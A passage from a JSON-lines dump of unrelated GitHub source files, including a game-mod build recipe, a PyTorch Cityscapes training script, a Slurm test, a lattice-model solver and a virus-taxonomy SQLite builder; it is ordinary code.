command_info.get(\"failure_message\")\n )\n\n if command_info.get(\"speak_args\") and command_success:\n text_to_speak = text_to_speak.format(*speak_args)\n\n if text_to_speak:\n speak_out(text_to_speak)\n\n if command_info.get(\"send_code\"):\n return \"codex \" + text_to_speak.format(*speak_args)\n\n except Exception:\n logging.exception(\"An error occurred while trying to execute command\")\n","repo_name":"Santhoshkumard11/Voice-Collab","sub_path":"python_scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6274,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"2481837324","text":"import logging\nimport shutil\nfrom lib.exec import SourceDir\nfrom lib.utils import rm_rf, rm\nfrom lib.recipes import Receipt\n\n\nclass KSPModFileLocalizer(Receipt):\n def __init__(self, game_dir, project_dir):\n super().__init__(game_dir, project_dir)\n self.source_dir = SourceDir(game_dir, project_dir.joinpath(\"Sources\", \"KSPModFileLocalizer\"))\n self.for_release_dir = self.project_dir.joinpath(\"FOR_RELEASE\")\n self.source_dir.output = self.for_release_dir.joinpath(\"KSPModFileLocalizer.dll\")\n self.target_file = game_dir.joinpath(\"GameData\", \"KSPModFileLocalizer.dll\")\n\n def build(self):\n logging.info(\" Build Release\")\n rm(self.for_release_dir, \"*.dll\")\n self.source_dir.std_compile(\n references=[\"Assembly-CSharp.dll\", \n \"Assembly-CSharp-firstpass.dll\", \n \"UnityEngine.dll\", \n \"UnityEngine.CoreModule.dll\", \n \"UnityEngine.UI.dll\"])\n\n def can_install(self):\n return self.source_dir.output.exists()\n\n def install(self):\n rm_rf(self.target_file)\n shutil.copy(self.source_dir.output, self.target_file)\n\n def check_installed(self):\n return self.target_file.exists()\n","repo_name":"untoldwind/kerbal-env","sub_path":"lib/recipes/KSPModFileLocalizer.py","file_name":"KSPModFileLocalizer.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36090280375","text":"import sys\nimport random\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.transforms.functional as TF\n\nfrom resnet_dgcn import resnet_with_dgcn\nfrom PIL import ImageFile\n\n\ndef adaptive_lr(optimizer, epoch, total_epoch, init=0.01):\n\n \n lr = init * math.pow(1.0 - epoch/total_epoch, 0.9)\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n return optimizer\n\n\nclass Cityscapes:\n\n def __init__(self):\n\n img_transform = transforms.Compose(\n [transforms.ToTensor(), transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))]\n )\n self.trainset = torchvision.datasets.Cityscapes(\n root='./cityscapes',\n split='train',\n mode='fine',\n target_type='semantic',\n transforms=self.cropNflip\n )\n self.trainloader = torch.utils.data.DataLoader(self.trainset,batch_size=1,shuffle=True, num_workers=4)\n\n self.validset = torchvision.datasets.Cityscapes(\n root='./cityscapes',\n split='val',\n mode='fine',\n target_type='semantic',\n transform=img_transform,\n target_transform=self.label_heat_map\n )\n self.validloader = torch.utils.data.DataLoader(self.validset,batch_size=1,shuffle=False, num_workers=4)\n\n return\n\n def cropNflip(self, img, smnt):\n\n crop_size=768\n assert img.size[0] == smnt.size[0]\n assert img.size[1] == smnt.size[1]\n\n if random.random() > 0.5:\n img = TF.hflip(img)\n smnt = TF.hflip(smnt)\n\n W, H = img.size\n x = random.randint(0, W-crop_size-1)\n y = random.randint(0, H-crop_size-1)\n img = TF.crop(img, y, x, crop_size, crop_size)\n smnt = TF.crop(smnt, y, x, crop_size, crop_size)\n\n img = TF.to_tensor(img)\n img = TF.normalize(img, (0.485, 0.456, 0.406), (0.229, 0.224, 0.225))\n smnt = torch.round(TF.to_tensor(smnt)*256)\n smnt = self.label(smnt)\n\n return img, smnt\n\n def label(self, smnt):\n\n '''\n class_name class_num\n road 1\n sidewalk 2\n building 3\n wall 4\n fence 5\n pole 6\n traffic light 7\n traffic sign 8\n vegetation 9\n terrain 10\n sky 11\n person 12\n rider 13\n car 14\n truck 15\n bus 16\n train 17\n motorcycle 18\n license plate 19\n others 0\n '''\n\n smnt = torch.where((smnt<7) | (smnt==9) | (smnt==10) | (smnt==14) | (smnt==15) | (smnt==16) | (smnt==18) | (smnt==29) | (smnt==30), torch.zeros(smnt.shape), smnt)\n\n smnt = smnt - 6\n smnt = torch.where(smnt >= 5, smnt-2, smnt)\n smnt = torch.where(smnt >= 9, smnt-3, smnt)\n smnt = torch.where(smnt >= 8, smnt-1, smnt)\n smnt = torch.where(smnt >= 19, smnt-2, smnt)\n smnt = torch.clamp(smnt, min=0)\n\n return smnt\n\n def label_heat_map(self, smnt):\n\n smnt = torch.round(TF.to_tensor(smnt)*256)\n\n return self.label(smnt)\n\n\ndef train(device, use_spatial=True, use_feature=True, d=8, total_epoch=180, init_lr=0.01):\n\n cityscapes = Cityscapes()\n resnet = resnet_with_dgcn(use_spatial, use_feature, d)\n trainloader = cityscapes.trainloader\n\n criterion = nn.CrossEntropyLoss(ignore_index=0).to(device)\n optimizer = optim.SGD(resnet.parameters(), lr=init_lr, momentum=0.9,weight_decay=0.0001)\n resnet.to(device)\n\n print('Training Start')\n for epoch in range(total_epoch):\n\n for i, data in enumerate(trainloader, 0):\n\n try:\n img, semantic = data\n img = img.to(device)\n optimizer.zero_grad()\n\n prediction = resnet(img)['out']\n prediction = prediction.to(device)\n batch, _, H, W = semantic.shape\n semantic = torch.reshape(semantic, (batch, H, W))\n semantic = semantic.long().to(device)\n\n loss = criterion(prediction, semantic)\n optimizer = adaptive_lr(optimizer, epoch, total_epoch, init_lr)\n loss.backward()\n optimizer.step()\n\n if i%100 == 99:\n print(\"[Epoch: %d, Trained Images in Batch: %d] Loss = %f\" % (epoch+1, i+1, loss.item()))\n\n except InterruptedError:\n continue\n\n if (epoch+1)%20 == 0:\n\n torch.save(resnet.state_dict(), './model/resnet_dgcn_epoch_{}.pth'.format(epoch+1))\n\n print('Training Finished')\n\n return\n\n\ndef main():\n\n if not torch.cuda.is_available():\n\n print(\"Training is only for CUDA available environment\")\n return\n\n torch.backends.cudnn.benchmark = True\n device = torch.device('cuda:0')\n torch.cuda.set_device(device)\n train(device)\n\n return\n\n\nif __name__ == \"__main__\":\n\n ImageFile.LOAD_TRUNCATED_IMAGES = True\n sys.exit(main())\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"qpwodlsqp/dgcn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45462286105","text":"from queue import PriorityQueue\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef build_linked_list(l):\n if not l:\n return\n n = len(l)\n root = node = ListNode(None)\n for idx in range(0, n):\n new_node = ListNode(l[idx])\n node.next = new_node\n node = new_node\n return root.next\n\n\nclass Solution:\n def mergeKLists(self, lists):\n if not lists:\n return\n\n root = node = ListNode(None)\n q = PriorityQueue()\n for idx, l in enumerate(lists):\n if l:\n q.put((l.val, idx))\n while not q.empty():\n min_val, min_idx = q.get()\n new_node = ListNode(min_val)\n node.next = new_node\n node = new_node\n lists[min_idx] = lists[min_idx].next\n if lists[min_idx]:\n q.put((lists[min_idx].val, min_idx))\n return root.next\n\n\nif __name__ == '__main__':\n s = Solution()\n lists = [\n build_linked_list([1, 4, 5]),\n build_linked_list([1, 3, 4]),\n build_linked_list([2, 6])\n ]\n result = s.mergeKLists(lists)\n","repo_name":"yannickkiki/programming-training","sub_path":"Leetcode/python3/23_merge_k_sorted_lists.py","file_name":"23_merge_k_sorted_lists.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"31273978113","text":"import atf\nimport pytest\nimport re\n\n\n# Setup\n@pytest.fixture(scope=\"module\", autouse=True)\ndef setup():\n atf.require_slurm_running()\n\n\ndef test_immediate():\n\n # Spawn a srun immediate execution job with hold (priority==0) option,\n # The job can't run immediately with a priority of zero\n run_error = atf.run_command_error(\"srun --immediate --hold pwd\")\n assert re.search(r'Unable to allocate resources', run_error) is not None\n\n # test that --immediate runs in under 2 seconds\n assert atf.run_command_exit(\"srun --immediate pwd\", timeout=2) == 0\n","repo_name":"SchedMD/slurm","sub_path":"testsuite/python/tests/test_116_11.py","file_name":"test_116_11.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":2074,"dataset":"github-code","pt":"19"} +{"seq_id":"32846274947","text":"def at_boundary_p(pos, m, n):\n x, y = pos\n return x == 0 or x == 2 * m or y == 0 or y == 2 * n\n\n\ndef count_neighbor_filled(pos, state, m, n):\n x, y = pos\n neighbors = get_neighbors(pos, m, n)\n return len([n for n in neighbors if state[n[0], n[1]] != ' '])\n\n\ndef get_neighbor_centers(pos, m, n):\n x, y = pos\n if x == 0:\n return [(x + 1, y)]\n elif x == 2 * m:\n return [(x - 1, y)]\n elif y == 0:\n return [(x, y + 1)]\n elif y == 2 * n:\n return [(x, y - 1)]\n elif y % 2 == 0:\n # on 'vertical lines\n return [(x, y - 1), (x, y + 1)]\n else:\n return [(x - 1, y), (x + 1, y)]\n\n\ndef center_to_vertices(pos):\n x, y = pos\n return [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]\n\n\ndef get_neighbors(pos, m, n):\n x, y = pos\n if x < 0 or x > 2 * m - 1 or y < 0 or y > 2 * n - 1 or (x + y) % 2 == 0:\n raise RuntimeError(\n \"Illegal vertex position ({}, {}). Lattice size: {} rows, {} columns.\"\n .format(x, y, m, n))\n return [\n z for z in sum(\n map(center_to_vertices, get_neighbor_centers(pos, m, n)), [])\n if (not z == pos)\n ]\n\n\n# * algorithm\n# given boundary conditions:\n# - locate_target :: among the vertices with most number of neighbors, choose the *left* most in *down* most one\n# TODO: prove by induction {min max # neighbor = 2}\n# - if it has 3 neighbors, it is automatically determined.\n# goto locate_target\n# - if it has 2 neighbors, split into 2 subroutines\n\n\ndef get_left_most_in_down_compare_gt(pos1, pos2):\n x1, y1 = pos1\n x2, y2 = pos2\n if y1 < y2:\n return 1\n elif y1 > y2:\n return -1 # y1 = y2 below\n elif x1 < x2:\n return 1\n elif x1 > x2:\n return -1\n else:\n return 0\n\n\ndef max_elem_with_cmp(lst, gt_fn):\n if len(lst) < 1:\n raise RuntimeError(\"max_elem_with_cmp: lst shouldn't be empty.\")\n elif len(lst) == 1:\n return lst[0]\n\n max_elem = lst[0]\n for n in range(1, len(lst)):\n if gt_fn(lst[n], max_elem) == 1:\n max_elem = lst[n]\n\n return max_elem\n\n\ndef get_left_most_in_down_most(lst):\n return max_elem_with_cmp(lst, get_left_most_in_down_compare_gt)\n\n\ndef vertex_p(pos, m, n):\n x, y = pos\n return 0 <= x and x <= 2 * m and 0 <= y and y <= 2 * n and (x + y) % 2 == 1\n\n\ndef filled_p(pos, state, m, n):\n x, y = pos\n if (not (vertex_p(pos, m, n))):\n raise RuntimeError(\"filled_p: pos isn't a vertex!\")\n\n content = state[x, y]\n return content == 2 or content == 1\n\n\ndef get_unfilled_with_most_filled_neighbors(unfilled, state, m, n):\n num_filled_neighbors_dict = {}\n num_filled_neighbors = []\n for p in unfilled:\n num = len(\n [q for q in get_neighbors(p, m, n) if filled_p(q, state, m, n)])\n num_filled_neighbors_dict[p] = num\n num_filled_neighbors.append(num)\n\n max_num = max(num_filled_neighbors)\n return [p for p in unfilled if num_filled_neighbors_dict[p] == max_num]\n\n\n# TODO: implement this\ndef inspect(state, pos, nc, pieces, m, n):\n \"\"\"According to given pieces, list all possibilities of filling\n the pieces centered at nc.\n Return dict of {pos, char to fill in there}.\n \"\"\"\n cx, cy = nc\n unfilled = [\n p for p in [(cx - 1, cy), (cx, cy + 1), (cx, cy - 1), (cx + 1, cy)]\n if (not filled_p(p, state, m, n))\n ]\n\n unfilled_num = len(unfilled)\n\n if unfilled_num == 0:\n raise RuntimeError(\n \"expecting to fill a pieces, but it has already been filled.\")\n elif unfilled_num == 1:\n pass\n else:\n return {} # give up (unfilled_num > 2:)\n\n pass\n\n\ndef maybe_fill_new(state, pos, pieces, m, n):\n neighbor_center_one_or_two = get_neighbor_centers(pos, m, n)\n\n nc_num = len(neighbor_center_one_or_two)\n if nc_num == 1:\n debug_output(\"pos: {}\".format(pos))\n debug_output(\"m, n: {}, {}\".format(m, n))\n raise RuntimeError(\n \"Attempt to fill a vertex with only one neighbor center. Currently no support for incomplete boundary condition.\"\n )\n\n # then we assume nc_num = 2, and should look at the two neighboring pieces\n for nc in neighbor_center_one_or_two:\n inspect(state, pos, nc, pieces, m, n)\n\n pass\n\n\ndef some_test(state, m, n):\n \"\"\"test unfilled_positions,\n get_unfilled_with_most_filled_neighbors and\n get_left_most_in_down_most.\n\n \"\"\"\n state_clone = copy.deepcopy(state)\n unfilled_ = unfilled_positions(stqate_clone, m, n)\n unfilled = get_unfilled_with_most_filled_neighbors(unfilled_, state_clone,\n m, n)\n pos = get_left_most_in_down_most(unfilled)\n print(\"[debug], pos: {}\".format(pos))\n for p in unfilled:\n state_clone[p[0], p[1]] = 2\n render(state_clone, m, n)\n","repo_name":"w9DhSc/naive-lattice-model-solver","sub_path":"smarter.py","file_name":"smarter.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"721014433","text":"# todo consider using https://github.com/etetoolkit/ete , http://etetoolkit.org/\n# A Python framework for the analysis and visualization of trees.\n# http://etetoolkit.org/cookbook/ete_build_basics.ipynb\n\n\nfrom pathlib import Path\nimport logging\n\nlogging.info('tk...')\nfrom tkinter import filedialog\n\nimport datetime\n\nlogging.info('sqlite3...')\nimport sqlite3\n\n# http://biopython.org/\nlogging.info('Bio...')\nfrom Bio import SeqIO\nfrom Bio import GenBank # too ?\n#import BioSQL\n#from BioSQL import BioSeqDatabase\n\n#import PyQt5\n#class RefSchema\n\n\nclass CreateTaxa:\n def __init__(self, db, superkingdom_name, root_taxa_name, NCBI_TaxID = None, syn=None):\n self.db=db\n self.c = db.cursor()\n self.kingdom = superkingdom_name\n self.root_rank = self._root_rank('superkingdom', superkingdom_name)\n self.root_taxa = self._root_taxa(root_taxa_name, root_taxa_name, NCBI_TaxID)\n\n def _root_rank (self, name, kingdom): # todo: NCBI ? add kingdom ! determine type of rank.\n self.c.execute(\"INSERT INTO taxa_rank (Name, kingdom )\"\n \" VALUES (? , ? )\",\n ( name, kingdom ) )\n self.root_rank = self.c.lastrowid\n return self.root_rank\n\n def _root_taxa (self, name, vulgar, NCBI_TaxID = None, syn=None):\n self.c.execute(\"INSERT INTO taxa (Name , vulgar, Id_rank , NCBI_TaxID )\"\n \" VALUES ( ? , ? , ? , ? )\",\n (name , vulgar, self.root_rank, NCBI_TaxID))\n self.root_taxa = self.c.lastrowid\n self.c.execute(\"INSERT INTO taxa_parents (Id_taxa , parent , Id_rank )\"\n \" VALUES ( ? , ? , ? )\",\n (self.root_taxa , self.root_taxa, self.root_rank))\n self.synonyms(self.root_taxa, [name, vulgar, NCBI_TaxID])\n if syn: self.synonyms(self.root_taxa, syn)\n return self.root_taxa\n\n def rank (self, name, parent_rank):\n self.c.execute(\"INSERT INTO taxa_rank (Name, kingdom , parent )\"\n \" VALUES (? , ? , ? )\",\n ( name, self.kingdom, parent_rank ) )\n return self.c.lastrowid\n\n def taxa (self, name, vulgar, rank, parent_taxa, NCBI_TaxID = None, syn=None):\n\n self.c.execute(\"INSERT INTO taxa (Name, vulgar, Id_rank, parent , NCBI_TaxID )\"\n \" VALUES (? , ? , ? , ? , ? )\",\n (name, vulgar , rank , parent_taxa, NCBI_TaxID))\n Id_taxa=self.c.lastrowid\n self.c.execute(\"INSERT INTO taxa_parents (Id_taxa, parent, Id_rank )\"\n \" VALUES ( ? , ? , ? )\",\n (Id_taxa , Id_taxa, rank ) )\n self.c.execute(\"INSERT INTO taxa_parents (Id_taxa, parent, Id_rank )\"\n \" SELECT ? , parent, Id_rank \"\n \"FROM taxa_parents WHERE Id_taxa=?\", (Id_taxa , parent_taxa ) )\n\n self.synonyms(Id_taxa, [name, vulgar, NCBI_TaxID])\n if syn: self.synonyms(Id_taxa, syn)\n return Id_taxa\n\n def synonyms(self, Id_taxa, names):\n if isinstance(names, str):\n names=[names]\n for name in names:\n if not name: continue\n self.c.execute(\"INSERT INTO taxa_names (Id_taxa, Name )\"\n \" VALUES ( ? , ? )\",\n (Id_taxa, name ) )\n\n\ndef rank_ID(db_cursor, rank_name):\n db_cursor.execute(\"SELECT Id_rank FROM taxa_rank WHERE Name=?\", (rank_name,))\n return db_cursor.fetchone()[0]\n\n\ndef rank_ID_taxa(db_cursor, Id_taxa):\n db_cursor.execute(\"SELECT Id_rank FROM taxa WHERE Id_taxa=?\", (Id_taxa,))\n return db_cursor.fetchone()[0]\n\n#def createBioSQL(newly) -> sqlite3.Connection:\n#\n# server = BioSeqDatabase.open_database(driver=\"sqlite3\", db=\"HEV\")\n# try:\n# db = server[\"HEV\"]\n# except KeyError:\n# db = server.new_database(\"HEV\",\n# description=\"For testing GBrowse\")\n #db = sqlite3.connect(\"../data/temp/BioSQL.db\")\n #if newly:\n #read_create(db)\n #print('Adding default taxas...')\n #add_def_taxa(db)\n #print('Adding reference schemes...')\n #add_ref_schema(db)\n #db.commit()\n#\n# return db\n#\n#def read_createBioSQL(db):\n# with open(\"biosqldb-sqlite.sql\") as dbcreate:\n# sql_create = dbcreate.read()\n# c = db.cursor()\n# c.executescript(sql_create)\n\n\ndef create(newly: bool, file_name: Path=None) -> sqlite3.Connection:\n if file_name is None:\n file_name = Path(\"../data/temp/seq.db\")\n db = sqlite3.connect(file_name)\n if newly:\n read_create(db)\n print('Adding default taxas...')\n add_def_taxa(db)\n print('Adding reference schemes...')\n add_ref_schema(db)\n db.commit()\n\n return db\n\n\ndef read_create(db):\n logging.info(\"executescript create_seq.sql\")\n with open(\"create_seq.sql\") as dbcreate:\n sql_create = dbcreate.read()\n c = db.cursor()\n c.executescript(sql_create)\n\n\ndef read_country_codes(db):\n with open(\"country_codes.sql\") as dbcreate:\n sql_create = dbcreate.read()\n c = db.cursor()\n c.executescript(sql_create)\n db.commit()\n\n\ndef add_ref_schema(db):\n c = db.cursor()\n for sch in [('Lu' , 'Lu, Li, 2006' ),\n ('VR' , 'Vina-Rodriguez, 2015' ),\n ('ICVT', 'ICVT, 2016' ) ] :\n c.execute(\"INSERT INTO ref_schema (schema, name) VALUES (?, ?)\", sch)\n\n\ndef add_def_taxa(db):\n # todo evaluate if partially reconstruct from https://ftp.ncbi.nlm.nih.gov/pub/taxonomy/new_taxdump/\n # todo by extracting all the info from all descendant from a given taxa, for example 291484: family Hepeviridae\n # see also http://etetoolkit.org/docs/2.3/tutorial/tutorial_ncbitaxonomy.html\n # https://ftp.ncbi.nlm.nih.gov/pub/taxonomy/new_taxdump/taxdump_readme.txt\n # https://github.com/etetoolkit/ete/blob/master/ete3/ncbi_taxonomy/ncbiquery.py\n\n ct = CreateTaxa(db,\n superkingdom_name = 'Viruses',\n root_taxa_name = 'Viridae',\n NCBI_TaxID = '10239',\n syn = ['Viridae', 'Vira','viruses'])\n\n realm = ct.rank(name='Realm', parent_rank=ct.root_rank) # no rank at NCBI\n Riboviria = ct.taxa(name = 'Riboviria',\n vulgar = 'RNA viruses',\n rank = realm,\n parent_taxa = ct.root_taxa,\n NCBI_TaxID = '439488')\n\n phylum = ct.rank(name='phylum', parent_rank=realm)\n Negarnaviricota = ct.taxa(name = 'Negarnaviricota',\n vulgar = '',\n rank = phylum,\n parent_taxa = Riboviria,\n NCBI_TaxID = '2497569')\n\n subphylum = ct.rank(name='subphylum', parent_rank=phylum)\n Polyploviricotina = ct.taxa(name = 'Polyploviricotina',\n vulgar = '',\n rank = subphylum,\n parent_taxa = Negarnaviricota,\n NCBI_TaxID = '2497571')\n\n Class = ct.rank(name='class', parent_rank=subphylum)\n Ellioviricetes = ct.taxa(name = 'Ellioviricetes',\n vulgar = '',\n rank = Class,\n parent_taxa = Polyploviricotina,\n NCBI_TaxID = '2497576')\n\n order = ct.rank(name='Order', parent_rank=Class)\n Bunyavirales = ct.taxa(name = 'Bunyavirales',\n vulgar = 'Bunyavirales',\n rank = order,\n parent_taxa = Ellioviricetes,\n NCBI_TaxID = '1980410')\n\n family = ct.rank(name='family', parent_rank=order)\n subfamily = ct.rank(name='subfamily', parent_rank=family)\n\n Arenaviridae = ct.taxa('Arenaviridae' , 'Arenaviridae', family, Bunyavirales, '11617')\n Hantaviridae = ct.taxa('Hantaviridae' , 'Hantaviridae', family, Bunyavirales, '1980413')\n Nairoviridae = ct.taxa('Nairoviridae' , 'Nairoviridae', family, Bunyavirales, '1980415')\n Peribunyaviridae = ct.taxa('Peribunyaviridae' , 'Peribunyaviridae', family, Bunyavirales, '1980416')\n Phenuiviridae = ct.taxa('Phenuiviridae' , 'Phenuiviridae', family, Bunyavirales, '1980418')\n\n tHEV = ct.taxa('Hepeviridae', 'HEV' , family, Riboviria, '291484',\n syn=['2021911', '1009842', '172851', '2021912', '2021913', '2021914', '1216472', '996468',\n '1638959', '1638960', '1674928', '1530451', '1328106', '1229326', '879095', '301242'])\n\n # 172851 Avian hepatitis E virus, 2021912 Barns Ness breadcrumb sponge hepe-like virus 2,\n # 2021913, Barns Ness breadcrumb sponge hepe-like virus 3, 2021914 Barns Ness breadcrumb sponge hepe-like virus 4\n # 1216472, Bat hepevirus; 996468 Hepatitis E virus rat/USA/2003; 1638959 Mystacina/New Zealand/2013/3\n # 1638960 Mystacina/New Zealand/2013; 1674928 seal/AAUST73/BR/2012 ; 1530451 Fesavirus 2; 1328106 Fox\n # 1229326 Hepelivirus; 879095 rat/R68/DEU/2009; 301242 Big liver and spleen disease virus\n\n genus = ct.rank(name='genus', parent_rank=subfamily)\n Orthobunyavirus = ct.taxa('Orthobunyavirus', 'Bunyavirus', genus, Peribunyaviridae, '11572', syn=['Bunyaviruses']) # syn ?\n Orthonairovirus_genus = ct.taxa('Orthonairovirus', 'Nairovirus', genus, Nairoviridae, '1980517')\n Phlebovirus = ct.taxa('Phlebovirus', 'Phlebovirus', genus, Phenuiviridae, '11584')\n\n tOrthHEV= ct.taxa('Orthohepevirus', 'Orthohepevirus' , genus, tHEV, '1678141', syn=['12461', 'Hepatitis E virus','186677', 'Hepevirus'])\n tPisci = ct.taxa('Piscihepevirus', 'Piscihepevirus' , genus, tHEV, '1678142')\n\n species = ct.rank('species', parent_rank=genus)\n subspecies = ct.rank('species', parent_rank=species)\n\n tBySp = ct.taxa('Bunyamwera orthobunyavirus', 'Bunyamwera orthobunyavirus' , species, Orthobunyavirus, '1933179')\n tByVr = ct.taxa('Bunyamwera virus', 'Bunyamwera serogroup' , subspecies, tBySp, '35304', syn=['Bunyamwera virus group', 'Bunyamwera bunyavirus group'])\n tBtVr = ct.taxa('Batai virus', 'Batai' , subspecies, tBySp, '80942' )\n\n # Orthonairovirus_genus species\n # Serogroup Crimean-Congo hemorrhagic fever\n CCHFV_Sp = ct.taxa('Crimean-Congo hemorrhagic fever orthonairovirus', 'CCHFV', species, Orthonairovirus_genus, '1980519', syn=['402369', '402370', '402371']) # and many more <--- actually subCC # JF807432.1, JF523542.1 seg-L 258, 490 = but - to different\n HAZV_Sp = ct.taxa('Hazara orthonairovirus', 'HAZV', species, Orthonairovirus_genus, '1980522', syn=['11596', '11597']) # <--- actually subHAZ ?\n TFLV_Sp = ct.taxa('Tofla orthonairovirus', 'TFLV', species, Orthonairovirus_genus, '1615758') # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n\n # Serogroup Dera Ghazi Khan\n DGKV_Sp = ct.taxa('Dera Ghazi Khan orthonairovirus', 'DGKV', species, Orthonairovirus_genus, '1980520')\n AHV_Sp = ct.taxa('Abu Hammad virus', 'AHV', subspecies, DGKV_Sp, '248058')\n AMV_Sp = ct.taxa('Abu Mina virus', 'AMV', subspecies, DGKV_Sp, '248059')\n\n # Serogroup Hughes\n HUGV_Sp = ct.taxa('Hughes orthonairovirus', 'HUGV', species, Orthonairovirus_genus, '248053')\n FARV_Sp = ct.taxa('Farallon virus', 'FARV', subspecies, HUGV_Sp, '248059')\n PSV_Sp = ct.taxa('Punta salinas virus', 'PSV', subspecies, HUGV_Sp, '248056')\n RAZAV_Sp = ct.taxa('Raza virus', 'RAZAV', subspecies, HUGV_Sp, '248054')\n SOLV_Sp = ct.taxa('Soldado virus', 'SOLV', subspecies, HUGV_Sp, '426791')\n # Zirqa (ZIRV)\n CASV_Sp = ct.taxa('Caspiy orthonairovirus', 'CASV', species, Orthonairovirus_genus, '1453405') # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n\n # Serogroup Sakhalin\n SAKV_Sp = ct.taxa('Sakhalin orthonairovirus', 'SAKV', species, Orthonairovirus_genus, '1980528')\n TILV_Sp = ct.taxa('Tillamook virus', 'TILV', subspecies, SAKV_Sp, '37297')\n CMV_Sp = ct.taxa('Clo Mor virus', 'CMV', subspecies, SAKV_Sp, '1810952')\n Taggert_Sp = ct.taxa('Taggert virus', 'Taggert', subspecies, SAKV_Sp, '487050')\n PMRV_Sp = ct.taxa('Paramushir orthonairovirus', 'PMRV', species, Orthonairovirus_genus, '1453409') # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n AVAV_Sp = ct.taxa('Avalon orthonairovirus', 'AVAV', species, Orthonairovirus_genus, '1810950') # not official. NCBI parent: no rank - unclassified viruses - 12429\n\n\n # Serogroup Nairobi sheep disease\n NSDV_Sp = ct.taxa('Nairobi sheep disease orthonairovirus', 'NSDV', species, Orthonairovirus_genus, '1980526', syn=['194540'])\n KUPV_Sp = ct.taxa('Kupe virus', 'KUPV', subspecies, NSDV_Sp, '498356')\n # Ganjam (GANV) strain ??\n DUGV_Sp = ct.taxa('Dugbe orthonairovirus', 'DUGV', species, Orthonairovirus_genus, '1980521')\n\n\n # Serogroup Qalyub\n QYBV_Sp = ct.taxa('Qalyub orthonairovirus', 'QYBV', species, Orthonairovirus_genus, '1980527')\n BDAV_Sp = ct.taxa('Bandia virus', 'BDAV', subspecies, QYBV_Sp, '248060')\n CHIMV_Sp = ct.taxa('Chim orthonairovirus', 'CHIMV', species, Orthonairovirus_genus, '2170062')\n GERV_Sp = ct.taxa('Geran orthonairovirus', 'GERV', species, Orthonairovirus_genus, '1453407') # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n\n\n # Serogroup Thiafora\n TFAV_Sp = ct.taxa('Thiafora orthonairovirus', 'TFAV', species, Orthonairovirus_genus, '1980529')\n ERVV_Sp = ct.taxa('Erve virus', 'ERVV', subspecies, TFAV_Sp, '248062')\n\n # Serogroup Issyk-kul\n # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n ISKV_Sp = ct.taxa('Issyk-kul orthonairovirus', 'ISKV', species, Orthonairovirus_genus, '1453408')\n GOSV_Sp = ct.taxa('Gossas orthonairovirus', 'GOSV', species, Orthonairovirus_genus, '1714376')\n UZAV_Sp = ct.taxa('Uzun Agach orthonairovirus', 'UZAV', species, Orthonairovirus_genus, '1523052')\n\n # Serogroup Kasokero\n KKOV_Sp = ct.taxa('Kasokero orthonairovirus', 'KKOV', species, Orthonairovirus_genus, '1980524', syn=['1712570'])\n Kasokero_Sp = ct.taxa('Kasokero virus', 'Kasokero', subspecies, KKOV_Sp, '1712570')\n # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n LPHV_Sp = ct.taxa('Leopards Hill orthonairovirus', 'LPHV', species, Orthonairovirus_genus, '1381104')\n YOGV_Sp = ct.taxa('Yogue orthonairovirus', 'YOGV', species, Orthonairovirus_genus, '1712572')\n\n # Serogroup Burana\n BURV_Sp = ct.taxa('Burana orthonairovirus', 'BURV', species, Orthonairovirus_genus, '1980518') # not official?\n Tacheng_Sp = ct.taxa('Tacheng Tick virus', 'Tacheng', subspecies, BURV_Sp, '1608083')\n TDYV_Sp = ct.taxa('Tamdy orthonairovirus', 'TDYV', species, Orthonairovirus_genus, '2170063', syn=['1453410']) # 1453410: unclassified Nairovirus\n Burana_Sp = ct.taxa('Burana virus', 'Burana', subspecies, TDYV_Sp, '1453404')\n\n Artashat_Sp = ct.taxa('Artashat orthonairovirus', 'Artashat', species, Orthonairovirus_genus, '2170061')\n Keterrah_Sp = ct.taxa('Keterrah orthonairovirus', 'Keterrah', species, Orthonairovirus_genus, '1980525', syn=['1712571'])\n Qalyub_Sp = ct.taxa('Qalyub orthonairovirus', 'Qalyub', species, Orthonairovirus_genus, '1980527')\n # Estero Real orthonairovirus : https://talk.ictvonline.org//taxonomy/p/taxonomy-history?taxnode_id=201850107\n # Estero Real orthobunyavirus : https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?name=Estero+Real+virus\n EsteroReal_Sp= ct.taxa('Estero Real orthonairovirus', 'Estero Real', species, Orthonairovirus_genus, '2170057')\n # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n Bat_Sp = ct.taxa('Bat orthonairovirus', 'Bat', species, Orthonairovirus_genus, '1340803')\n Beiji_Sp = ct.taxa('Beiji orthonairovirus', 'Beiji', species, Orthonairovirus_genus, '2304647')\n Grotenhout_Sp = ct.taxa('Grotenhout orthonairovirus', 'Grotenhout', species, Orthonairovirus_genus, '1971396') # too different. L:14,854, M:0, L:3728\n Nayun_Sp = ct.taxa('Nayun tick orthonairovirus', 'Nayun', species, Orthonairovirus_genus, '1610817')\n Norway_Sp = ct.taxa('Norway nairovirus 1 orthonairovirus', 'Norway 